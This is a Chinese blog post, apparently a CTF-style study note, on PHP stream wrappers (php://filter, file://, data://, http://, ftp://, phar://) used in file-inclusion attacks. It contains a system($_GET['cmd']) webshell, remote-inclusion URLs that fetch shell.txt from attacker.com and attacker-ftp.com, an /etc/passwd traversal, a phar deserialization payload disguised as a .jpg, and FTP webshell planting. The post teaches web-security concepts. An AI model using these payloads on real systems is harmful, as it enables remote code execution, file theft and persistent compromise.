<!DOCTYPE html><html lang="zh-CN"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="theme-color" content="#1a1a1a"><meta name="msapplication-navbutton-color" content="#1a1a1a"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black-translucent"><title>smileless的博客</title><script>(function() {
  // 尽早应用暗色模式，防止闪烁
  var savedDarkMode = localStorage.getItem('darkMode') === 'true';
  if (savedDarkMode) {
    document.documentElement.classList.add('dark-mode');
  }
})();
</script><link rel="preconnect" href="https://fonts.googleapis.com"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&amp;family=Playfair+Display:wght@400;500;600;700&amp;family=Fira+Code:wght@400;500&amp;display=swap" rel="stylesheet"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css"><script src="https://cdnjs.cloudflare.com/ajax/libs/qrcodejs/1.0.0/qrcode.min.js"></script><link rel="icon" href="/blog/null">
<link rel="stylesheet" href="/blog/css/main.css">

<link rel="stylesheet" href="/blog/css/tags.css">

<link rel="stylesheet" href="/blog/css/categories.css">

<link rel="stylesheet" href="/blog/css/categories-accordion.css">

<link rel="stylesheet" href="/blog/css/highlight.css">

<link rel="stylesheet" href="/blog/css/toc.css">

<link rel="stylesheet" href="/blog/css/image-zoom.css">

<link rel="stylesheet" href="/blog/css/share.css">

<link rel="stylesheet" href="/blog/css/mobile-nav.css">

<link rel="stylesheet" href="/blog/css/search.css">

<link rel="stylesheet" href="/blog/css/scrollbar.css">

<link rel="stylesheet" href="/blog/css/timeline.css">

<link rel="stylesheet" href="/blog/css/animations.css">

<link rel="stylesheet" href="/blog/css/ai-theme.css">

<link rel="stylesheet" href="/blog/css/loading-animation.css">

<link rel="stylesheet" href="/blog/css/article-modal.css">
<!-- 条件加载关于页面样式--><style>:root {
  --primary-color: #1a1a1a;
  --secondary-color: #666666;
  --accent-color: #ff6b6b;
  --background-color: #ffffff;
  --text-color: #333333;
  --overlay-color: rgba(0, 0, 0, 0.7);
  --tag-background-color: #ffffff;
  --card-background-color: #ffffff;
}
</style><link rel="stylesheet" href="https://cdn1.tianli0.top/gh/qxchuckle/Post-Summary-AI/chuckle-post-ai.css"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css"><meta name="generator" content="Hexo 8.1.1"><link rel="alternate" href="/blog/atom.xml" title="smileless的博客" type="application/atom+xml">
</head><body><div id="app"><header class="header navbar-bubble"><nav class="nav"><div class="nav-container"><div class="nav-logo"><a href="/blog/"><span class="nav-title">smileless的博客</span></a></div><div class="nav-menu"><a class="nav-item" href="/blog/">首页</a><a class="nav-item" href="/blog/about/">关于</a><a class="nav-item" href="/blog/archives/">归档</a><a class="nav-item" href="/blog/categories/">分类</a><a class="nav-item" href="/blog/tags/">标签</a><a class="nav-item" href="/blog/link/">友链</a><div class="nav-item has-submenu"><span class="nav-link">网站</span><div class="submenu"><a class="submenu-item" target="_blank" rel="noopener" href="https://example.com">示例网站</a></div></div><!-- 搜索按钮--><div class="search-toggle"><i class="fas fa-search"></i></div></div><div class="nav-toggle"><span></span><span></span><span></span></div></div></nav></header><div class="search-overlay"><div class="search-container"><div class="search-form"><input class="search-input" type="text" placeholder="搜索文章..."/><div class="search-close">×</div></div><div class="search-results"></div></div></div><main class="main"><div class="post-wrapper"><div class="toc-sidebar"><div class="toc-container"><div class="toc-title">目录</div><div class="toc-content" id="table-of-contents"><!-- Table of contents will be generated by JavaScript--></div></div></div><article class="post-container"><div class="post-header"><div class="post-cover"><img src="/blog/images/19.png" alt="PHP伪协议"/></div><div class="post-meta"><div class="post-category"><a href="/blog/categories/web/">Web</a></div><div class="post-date"><time datetime="2026-02-07T20:04:00.000Z">二月 08, 2026</time></div><div class="post-author"><span>By smileless</span></div></div><h1 class="post-title">PHP伪协议</h1><div class="post-tags"><a class="tag" href="/blog/tags/PHP/">PHP</a></div></div><!-- AI摘要模块容器--><div id="post-ai-container"></div><div class="post-content"><h1 id="PHP伪协议"><a href="#PHP伪协议" class="headerlink" title="PHP伪协议"></a>PHP伪协议</h1><p>标签 ： PHP</p>
<hr>
<h2 id="伪装协议"><a href="#伪装协议" class="headerlink" title="伪装协议"></a>伪装协议</h2><pre><code>1 file://
2 http://
3 ftp://
4 php://
5 zlib://
6 data://
7 glob://
8 phar://
9 ssh2://
10 rar://
11 ogg://
12 expect://
</code></pre>
<p><strong>常见过滤器：</strong></p>
<ul>
<li><code>convert.base64-encode</code> &#x2F; <code>convert.base64-decode</code></li>
<li><code>convert.quoted-printable-encode</code></li>
<li><code>string.rot13</code></li>
<li><code>string.strip_tags</code></li>
</ul>
<hr>
<h2 id="php-filter-详解："><a href="#php-filter-详解：" class="headerlink" title="php:&#x2F;&#x2F;filter 详解："></a><strong>php:&#x2F;&#x2F;filter 详解：</strong></h2><ul>
<li><p><strong>读取模式（read）</strong><br>语法：<code>php://filter/read=filter_name/resource=target_file</code><br>示例：  </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$a</span> = <span class="string">&quot;php://filter/read=convert.base64-encode/resource=index.php&quot;</span>;</span><br><span class="line"><span class="keyword">include</span>(<span class="variable">$a</span>);</span><br></pre></td></tr></table></figure>
<p>此时会将 <code>index.php</code> 的源码进行 Base64 编码后输出，绕过直接执行 PHP 代码，常用于源码泄露。</p>
</li>
<li><p><strong>写入模式（write）</strong><br>语法：<code>php://filter/write=filter_name/resource=target_file</code><br>示例：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$data</span> = <span class="string">&quot;&lt;?php phpinfo(); ?&gt;&quot;</span>; <span class="comment">// 要写入的内容</span></span><br><span class="line"><span class="variable">$target</span> = <span class="string">&quot;php://filter/write=string.rot13/resource=shell.php&quot;</span>;</span><br><span class="line"><span class="title function_ invoke__">file_put_contents</span>(<span class="variable">$target</span>, <span class="title function_ invoke__">str_rot13</span>(<span class="variable">$data</span>)); <span class="comment">// 注意需对数据预处理</span></span><br></pre></td></tr></table></figure></li>
</ul>
<hr>
<h2 id="file-详解"><a href="#file-详解" class="headerlink" title="file:&#x2F;&#x2F;详解"></a><strong>file:&#x2F;&#x2F;详解</strong></h2><p>file:&#x2F;&#x2F; 封装器允许 PHP 像处理 URL 一样处理本地文件路径，这使得 PHP 可以使用统一的 I&#x2F;O 函数（如 fopen()、file_get_contents() 等）来操作本地文件。</p>
<p>语法：<code>file:///path/to/your/file</code> </p>
<p>由于php文件的操作函数会默认使用file:&#x2F;&#x2F;协议来处理</p>
<p><strong>原理展示</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">程序代码:include($_get[`page`]);</span><br><span class="line">用户输入:../../../etc/passwd</span><br><span class="line">实际处理: include(`file://../../../etc/passwd`)</span><br></pre></td></tr></table></figure>

<p>就可以根据file:&#x2F;&#x2F;协议来进行目录遍历，从而获得目标文件</p>
<hr>
<h2 id="data-详解"><a href="#data-详解" class="headerlink" title="data:&#x2F;&#x2F;详解"></a><strong>data:&#x2F;&#x2F;详解</strong></h2><p>基本语法<code>data:[&lt;MIME-type&gt;][;charset=&lt;encoding&gt;][;base64],&lt;data&gt;</code><br>工作方式： 当 PHP 遇到这个协议时，它不会进行任何网络或文件系统的操作，而是直接从 URI 的 <data> 部分提取内容，并将其作为文件内容提供给函数（如 include, file_get_contents 等）。</p>
<p>攻击案例</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">if(file_get_contents($file2) === &quot;hello ctf&quot;)</span><br><span class="line">        &#123;</span><br><span class="line">            include($file1);</span><br><span class="line">        &#125;</span><br><span class="line">        //就需要构造file2=data://text/plain,hellow ctf</span><br></pre></td></tr></table></figure>
<hr>
<h2 id="http-详解"><a href="#http-详解" class="headerlink" title="http:&#x2F;&#x2F;详解"></a><strong>http:&#x2F;&#x2F;详解</strong></h2><p>它与我们之前讨论的 file:&#x2F;&#x2F;（本地文件）和 data:&#x2F;&#x2F;（嵌入数据）不同，http:&#x2F;&#x2F; 是用来连接到 Web 服务器并获取其内容的。</p>
<p>**<code>http://</code>**协议是实现远程文件包含的重要伪协议</p>
<p><em><strong>攻击前提</strong></em>：攻击前提条件（关键）： 要利用 http:&#x2F;&#x2F; 来包含文件，PHP 配置文件中的 allow_url_include 必须设置为 On。如果只是 file_get_contents() 或 fopen()，只需要 allow_url_fopen &#x3D; On。</p>
<p>攻击步骤：<br>攻击者首先在自己的服务器（例如 <a target="_blank" rel="noopener" href="http://attacker.com)上创建一个包含/">http://attacker.com）上创建一个包含</a> PHP 代码的文件，例如 shell.txt：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    system($_GET[&#x27;cmd&#x27;]);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>攻击的目标存在一个文件包含漏洞（include($get_[<code>a</code>])）<br>   然后利用http:&#x2F;&#x2F;协议来进行攻击</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://target.com/ &lt; target.php &gt; ? a = http://attacker.com/shell.txt</span><br></pre></td></tr></table></figure>
<p>后续可以依靠antsword和hackbar等工具进行攻击</p>
<hr>
<h2 id="ftp-详解"><a href="#ftp-详解" class="headerlink" title="ftp:&#x2F;&#x2F;详解"></a><strong>ftp:&#x2F;&#x2F;详解</strong></h2><p>工作方式： PHP 会尝试根据 URL 中提供的信息连接到指定的 FTP 服务器，并对该服务器上的文件进行读取、写入或修改操作（取决于使用的函数和 FTP 权限）。</p>
<p>URL格式**<code>ftp://[username[:password]@]hostname[:port]/path/to/file</code>**</p>
<h2 id="攻击方法1"><a href="#攻击方法1" class="headerlink" title="攻击方法1"></a>攻击方法1</h2><p>依旧是在include()漏洞存在的情况和上述http:&#x2F;&#x2F;协议一样，在自己的服务器(<a target="_blank" rel="noopener" href="http://attacker.com)上面的文件可以上传到目标漏洞的服务器,然后在根据include/">http://attacker.com)上面的文件可以上传到目标漏洞的服务器，然后在根据include</a>($_get [ <code>a</code>])来进行攻击<br>攻击如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://example.com/&lt;target.php&gt;?a=ftp://anonymous@attacker-ftp.com/shell.txt</span><br></pre></td></tr></table></figure>

<p>此时假设可以匿名且无密码</p>
<p>结果： 漏洞程序会通过 FTP 下载 shell.txt 的内容，然后 include() 函数会执行其中的 PHP 代码，导致 RCE（远程代码执行）    </p>
<h2 id="攻击方法2"><a href="#攻击方法2" class="headerlink" title="攻击方法2"></a>攻击方法2</h2><p>如果应用程序允许用户控制目标路径和写入内容，并且使用了 fopen() 或 file_put_contents()，理论上可以滥用 ftp:&#x2F;&#x2F; 来修改远程 FTP 服务器上的文件（例如修改一个 Web 目录下的文件来植入 Webshell）。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$target = &quot;ftp://user:pass@target-ftp.com/www/config.php&quot;;</span><br><span class="line">$data = &quot;&lt;?php system(&#x27;id&#x27;); ?&gt;&quot;;</span><br><span class="line">file_put_contents($target, $data);</span><br></pre></td></tr></table></figure>
<hr>
<h2 id="phar-详解"><a href="#phar-详解" class="headerlink" title="phar:&#x2F;&#x2F;详解"></a><strong>phar:&#x2F;&#x2F;详解</strong></h2><p>Phar（PHP Archive） 是PHP的打包格式，类似于Java的JAR文件。phar:&#x2F;&#x2F;伪协议允许直接访问Phar文件内部的内容。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="title function_ invoke__">system</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;cmd&#x27;</span>]); <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>攻击者利用目标系统中存在的<strong>文件包含漏洞</strong>（如 <code>include($_GET[&#39;a&#39;]);</code>），结合PHP支持的伪协议，可实现远程代码执行。在已知可通过 <code>http://</code> 协议进行远程文件包含的基础上，进一步利用 <code>ftp://</code> 和 <code>phar://</code> 等协议扩大攻击面。<br>####攻击思路<br>当PHP代码中存在文件操作函数（如file_get_contents()、include()、unlink()等）且用户能控制参数时，可能触发反序列化漏洞。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">创建恶意文件</span><br><span class="line">&lt;?php</span><br><span class="line">class EvilClass &#123;</span><br><span class="line">    public $cmd = &#x27;whoami&#x27;;</span><br><span class="line">    </span><br><span class="line">    public function __destruct() &#123;</span><br><span class="line">        system($this-&gt;cmd);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">// 创建Phar文件</span><br><span class="line">$phar = new Phar(&#x27;evil.phar&#x27;);</span><br><span class="line">$phar-&gt;startBuffering();</span><br><span class="line">$phar-&gt;addFromString(&#x27;test.txt&#x27;, &#x27;test&#x27;);</span><br><span class="line">$phar-&gt;setStub(&#x27;&lt;?php __HALT_COMPILER(); ?&gt;&#x27;);</span><br><span class="line"></span><br><span class="line">// 添加恶意对象</span><br><span class="line">$object = new EvilClass();</span><br><span class="line">$object-&gt;cmd = $_GET[&#x27;cmd&#x27;];  // RCE命令</span><br><span class="line">$phar-&gt;setMetadata($object);</span><br><span class="line">$phar-&gt;stopBuffering();</span><br><span class="line"></span><br><span class="line">// 重命名绕过上传限制</span><br><span class="line">rename(&#x27;evil.phar&#x27;, &#x27;evil.jpg&#x27;);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<hr>
<h3 id="ftp-协议攻击详解"><a href="#ftp-协议攻击详解" class="headerlink" title="ftp:&#x2F;&#x2F; 协议攻击详解"></a><strong>ftp:&#x2F;&#x2F; 协议攻击详解</strong></h3><p>PHP 支持通过 <code>ftp://</code> 协议访问远程 FTP 服务，其格式为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ftp://[username[:password]@]hostname[:port]/path/to/file</span><br></pre></td></tr></table></figure>

<h4 id="攻击方法-1：结合文件包含进行-RCE"><a href="#攻击方法-1：结合文件包含进行-RCE" class="headerlink" title="攻击方法 1：结合文件包含进行 RCE"></a><strong>攻击方法 1：结合文件包含进行 RCE</strong></h4><p>当存在 <code>include($_GET[&#39;a&#39;])</code> 漏洞时，攻击者可构造如下请求：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://target.com/vuln.php?a=ftp://anonymous@attacker-ftp.com/shell.txt</span><br></pre></td></tr></table></figure>

<p>若目标服务器可出站连接且 FTP 服务允许匿名访问，PHP 将下载 <code>shell.txt</code> 并解析其中的 PHP 代码，造成<strong>远程代码执行（RCE）</strong>。</p>
<h4 id="攻击方法-2：写入远程-FTP-文件（反向利用）"><a href="#攻击方法-2：写入远程-FTP-文件（反向利用）" class="headerlink" title="攻击方法 2：写入远程 FTP 文件（反向利用）"></a><strong>攻击方法 2：写入远程 FTP 文件（反向利用）</strong></h4><p>若应用使用 <code>file_put_contents()</code> 或 <code>fopen()</code> 写入文件，且路径可控，则可滥用 <code>ftp://</code> 修改远程 FTP 服务器上的文件：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$target</span> = <span class="string">&quot;ftp://user:pass@target-ftp.com/public_html/backup.php&quot;</span>;</span><br><span class="line"><span class="variable">$data</span> = <span class="string">&quot;&lt;?php system(<span class="subst">$_GET</span>[&#x27;cmd&#x27;]); ?&gt;&quot;</span>;</span><br><span class="line"><span class="title function_ invoke__">file_put_contents</span>(<span class="variable">$target</span>, <span class="variable">$data</span>);</span><br></pre></td></tr></table></figure>

<p>成功后将在目标 Web 目录下植入 WebShell，实现持久化控制。</p>
<hr>
</div><!-- 初始化AI摘要--><script>document.addEventListener('DOMContentLoaded', function() {
  if (typeof ChucklePostAI !== 'undefined') {
    // 获取按钮文本，如果未定义则使用默认值
    const buttons = [
      "介绍自己",
      "来点灵感",
      "生成AI简介"
    ];

    new ChucklePostAI({
      el: '#post-ai-container',
      title_el: '.post-title',
      summary_directly: false,
      interface: {
        name: "然-AI",
        introduce: "我是文章辅助AI: 然-AI，一个基于deepseek的强大语言模型，有什么可以帮到您？😊",
        version: "deepseekv3",
        button: buttons
      }
    });
  }
});
</script><!-- 传递TOC配置给前端--><script>// 创建全局TOC配置对象
window.tocConfig = {
  empty_toc_behavior: "placeholder"
};
</script><div class="post-navigation"><div class="post-nav prev"><a href="/blog/2026/02/08/LCG/"><span class="nav-label">← Previous</span><span class="nav-title">LCG（线性同余生成器）简记</span></a></div><div class="post-nav next"><a href="/blog/2026/01/28/SQL%20union%E8%81%94%E5%90%88%E6%B3%A8%E5%85%A5/"><span class="nav-label">Next →</span><span class="nav-title">SQL union联合注入</span></a></div></div><div class="post-share"><h3 class="share-title">Share this article</h3><div class="share-buttons"><a class="share-btn twitter" href="https://twitter.com/intent/tweet?text=PHP%E4%BC%AA%E5%8D%8F%E8%AE%AE&amp;url=%2Fblog%2F2026%2F02%2F08%2FPHP%25E4%25BC%25AA%25E5%258D%258F%25E8%25AE%25AE%2F" target="_blank" rel="noopener"><span>Twitter</span></a><a class="share-btn facebook" href="https://www.facebook.com/sharer/sharer.php?u=%2Fblog%2F2026%2F02%2F08%2FPHP%25E4%25BC%25AA%25E5%258D%258F%25E8%25AE%25AE%2F" target="_blank" rel="noopener"><span>Facebook</span></a><a class="share-btn linkedin" href="https://www.linkedin.com/sharing/share-offsite/?url=%2Fblog%2F2026%2F02%2F08%2FPHP%25E4%25BC%25AA%25E5%258D%258F%25E8%25AE%25AE%2F" target="_blank" rel="noopener"><span>LinkedIn</span></a><a class="share-btn wechat" href="#" data-wechat="/blog/2026/02/08/PHP%E4%BC%AA%E5%8D%8F%E8%AE%AE/"><span>微信</span></a><a class="share-btn qq" href="https://connect.qq.com/widget/shareqq/index.html?url=%2Fblog%2F2026%2F02%2F08%2FPHP%25E4%25BC%25AA%25E5%258D%258F%25E8%25AE%25AE%2F&amp;title=PHP%E4%BC%AA%E5%8D%8F%E8%AE%AE" target="_blank" rel="noopener"><span>QQ</span></a><a class="share-btn weibo" href="https://service.weibo.com/share/share.php?url=%2Fblog%2F2026%2F02%2F08%2FPHP%25E4%25BC%25AA%25E5%258D%258F%25E8%25AE%25AE%2F&amp;title=PHP%E4%BC%AA%E5%8D%8F%E8%AE%AE" target="_blank" rel="noopener"><span>微博</span></a><a class="share-btn copy" href="#" data-copy="/blog/2026/02/08/PHP%E4%BC%AA%E5%8D%8F%E8%AE%AE/"><span>Copy Link</span></a></div></div></article></div></main><footer class="footer"><div class="footer-bottom"><div class="footer-copyright">© 2025 李思然. All rights reserved.</div><!-- Footer centered image with link--><div class="footer-image" style="text-align: center; margin: 15px 0;"><a href="https://www.upyun.com/?utm_source=lianmeng&amp;utm_medium=referral" target="_blank" rel="noopener noreferrer"><img src="https://s21.ax1x.com/2024/08/23/pAFm0cq.png" alt="Footer Image" style="max-width: 100%; height: auto;"/></a></div><div class="footer-badges"><a target="_blank" rel="noopener" href="https://hexo.io/" title="博客框架为Hexo_v5.4.0"><img src="https://npm.elemecdn.com/anzhiyu-blog@2.1.5/img/badge/Frame-Hexo.svg" alt="博客框架为Hexo_v5.4.0"/></a><a target="_blank" rel="noopener" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="本站采用知识共享署名-非商业性使用-相同方式共享4.0国际许可协议进行许可"><img src="https://npm.elemecdn.com/anzhiyu-blog@2.2.0/img/badge/Copyright-BY-NC-SA.svg" alt="本站采用知识共享署名-非商业性使用-相同方式共享4.0国际许可协议进行许可"/></a></div></div></footer></div><!-- 立即应用暗色模式，避免页面闪烁--><script>(function() {
  // 检查本地存储中的暗色模式设置
  const savedDarkMode = localStorage.getItem('darkMode') === 'true';
  // 如果设置为暗色模式，立即应用到body
  if (savedDarkMode) {
    document.body.classList.add('dark-mode');
  }

  // 防止页面闪烁，在DOM加载完成前设置一个初始类
  document.documentElement.style.visibility = 'hidden';
  document.addEventListener('DOMContentLoaded', function() {
    document.documentElement.style.visibility = 'visible';
  });
})();
</script>
<script src="/blog/js/main.js"></script>

<script src="/blog/js/tags.js"></script>

<script src="/blog/js/categories-accordion.js"></script>

<script src="/blog/js/highlight.js"></script>

<script src="/blog/js/load-more.js"></script>

<script src="/blog/js/header-scroll.js"></script>

<script src="/blog/js/toc.js"></script>

<script src="/blog/js/image-zoom.js"></script>

<script src="/blog/js/share.js"></script>

<script src="/blog/js/search.js"></script>

<script src="/blog/js/hide-inline-interaction.js"></script>

<script src="/blog/js/hide-toggle-interaction.js"></script>

<script src="/blog/js/dark-mode-sync.js"></script>

<script src="/blog/js/animations.js"></script>

<script src="/blog/js/ai-theme.js"></script>

<script src="/blog/js/loading-animation.js"></script>

<script src="/blog/js/article-modal.js"></script>
<script>window.theme = {
  features: {"dark_mode":true,"smooth_scroll":true,"back_to_top":true,"loading_animation":true},
  code_block: {"height_limit":200,"enable_folding":true,"max_height":"300px","show_lang":true},
  ai_summary: {"enable":true,"api_key":"","summary_directly":false,"ai_name":"然-AI","ai_introduce":"我是文章辅助AI: 然-AI，一个基于deepseek的强大语言模型，有什么可以帮到您？😊","ai_version":"deepseekv3","buttons":["介绍自己","来点灵感","生成AI简介"]},
  categories: {"layout":"accordion","accordion_animation":true,"show_empty_categories":true},
  article_list: {"card_size":"normal","view_mode":"modal"}
};
</script><script src="/js/ai.js"></script><script src="/js/postai.js"></script></body></html>